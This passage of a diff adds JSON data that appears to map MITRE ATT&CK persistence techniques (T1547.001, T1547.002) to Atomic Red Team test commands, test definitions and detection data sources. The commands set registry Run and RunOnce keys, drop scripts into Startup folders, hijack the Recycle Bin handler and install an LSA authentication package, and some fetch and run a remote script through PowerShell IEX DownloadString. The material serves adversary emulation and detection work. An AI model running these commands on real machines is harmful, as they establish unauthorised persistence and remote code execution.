one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1547.001", + "command_list": [ + "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"C:\\Path\\AtomicRedTeam.exe\"\n", + "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\Path\\AtomicRedTeam.dll\"\n", + "$RunOnceKey = \"#{reg_key_path}\"\nset-itemproperty $RunOnceKey \"NextRun\" 'powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "$RunOnceKey = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nset-itemproperty $RunOnceKey \"NextRun\" '#{thing_to_execute} \"IEX (New-Object 
Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = 
$WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", + "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", + "$RunKey = \"#{reg_key_path}\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File\"\n", + "$RunKey = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"#{reg_key_value}\"\n" + ], + "commands": [ + { + "command": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"C:\\Path\\AtomicRedTeam.exe\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\Path\\AtomicRedTeam.dll\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunOnceKey = \"#{reg_key_path}\"\nset-itemproperty $RunOnceKey \"NextRun\" 'powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunOnceKey = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nset-itemproperty $RunOnceKey \"NextRun\" '#{thing_to_execute} \"IEX (New-Object 
Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start 
Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunKey = \"#{reg_key_path}\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + }, + { + "command": "$RunKey = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"#{reg_key_value}\"\n", + "source": "atomics/T1547.001/T1547.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.001", + "display_name": "Boot or Logon Autostart Execution: 
Registry Run Keys / Startup Folder", + "atomic_tests": [ + { + "name": "Reg Key Run", + "auto_generated_guid": "e55be3fd-3521-4610-9d1a-e210e42dcf05", + "description": "Run Key Persistence\n\nUpon successful execution, cmd.exe will modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output will be via stdout. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_to_execute": { + "description": "Thing to Run", + "type": "Path", + "default": "C:\\Path\\AtomicRedTeam.exe" + } + }, + "executor": { + "command": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"#{command_to_execute}\"\n", + "cleanup_command": "REG DELETE \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /f >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Reg Key RunOnce", + "auto_generated_guid": "554cbd88-cde1-4b56-8168-0be552eed9eb", + "description": "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. 
\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "thing_to_execute": { + "description": "Thing to Run", + "type": "Path", + "default": "C:\\Path\\AtomicRedTeam.dll" + } + }, + "executor": { + "command": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"#{thing_to_execute}\"\n", + "cleanup_command": "REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "PowerShell Registry RunOnce", + "auto_generated_guid": "eb44f842-0457-4ddc-9b92-c4caa144ac42", + "description": "RunOnce Key Persistence via PowerShell\nUpon successful execution, a new entry will be added to the runonce item in the registry.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "thing_to_execute": { + "description": "Thing to Run", + "type": "Path", + "default": "powershell.exe" + }, + "reg_key_path": { + "description": "Path to registry key to update", + "type": "Path", + "default": "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" + } + }, + "executor": { + "command": "$RunOnceKey = \"#{reg_key_path}\"\nset-itemproperty $RunOnceKey \"NextRun\" '#{thing_to_execute} \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`\")\"'\n", + "cleanup_command": "Remove-ItemProperty -Path #{reg_key_path} -Name \"NextRun\" -Force -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Suspicious vbs file run from startup Folder", + "auto_generated_guid": "2cb98256-625e-4da9-9d44-f2e5f90b8bd5", + "description": "vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted and the user logs in.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Suspicious jse file run from startup Folder", + "auto_generated_guid": "dade9447-791e-4c8f-b04b-3a35855dfa06", + "description": "jse files can be placed in and ran from the startup folder to maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted and the user logs in.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Suspicious bat file run from startup Folder", + "auto_generated_guid": "5b6768e4-44d2-44f0-89da-a01d1430fd5e", + "description": "bat files can be placed in and executed from the startup folder to maintain persistance.\nUpon execution, cmd will be run and immediately closed. 
Additionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted and the user logs in.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Add Executable Shortcut Link to User Startup Folder", + "auto_generated_guid": "24e55612-85f6-4bd6-ae74-a73d02e3441d", + "description": "Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. 
", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", + "cleanup_command": "Remove-Item \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\" -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Add persistance via Recycle bin", + "auto_generated_guid": "bda6a3d6-7aa7-4e89-908b-306772e9662f", + "description": "Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)\nUser have to clic on the recycle bin to lauch the payload (here calc)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", + "cleanup_command": "reg DELETE \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\" /f", + "name": "command_prompt" + } + }, + { + "name": "SystemBC Malware-as-a-Service Registry", + "auto_generated_guid": "9dc7767b-30c1-4cc4-b999-50cab5e27891", + "description": "This Atomic will create a registry key called socks5_powershell for persistance access\nhttps://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "reg_key_value": { + "description": "Thing to Run", + "type": "Path", + "default": "powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File" + }, + "reg_key_path": { + "description": "Path to registry key to update", + "type": "Path", + "default": 
"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" + } + }, + "executor": { + "command": "$RunKey = \"#{reg_key_path}\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"#{reg_key_value}\"\n", + "cleanup_command": "Remove-ItemProperty -Path #{reg_key_path} -Name \"socks5_powershell\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], 
+ "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": 
"process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1547.002", + "command_list": [ + "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n" + ], + "commands": [ + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" 
/v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n", + "source": "atomics/T1547.002/T1547.002.yaml", + "name": "Atomic Red Team Test - Authentication Package" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.002", + "display_name": "Authentication Package", + "atomic_tests": [ + { + "name": "Authentication Package", + "auto_generated_guid": "be2590e8-4ac3-47ac-b4b5-945820f2fbe9", + "description": "Establishes persistence using a custom authentication package for the Local Security Authority (LSA).\nAfter a reboot, Notepad.exe will be executed as child process of lsass.exe.\nPayload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.002/package\n[Related blog](https://pentestlab.blog/2019/10/21/persistence-security-support-provider/)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n", + "cleanup_command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\" /f\nrm -force C:\\windows\\system32\\package.dll\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used 
by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line 
interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + 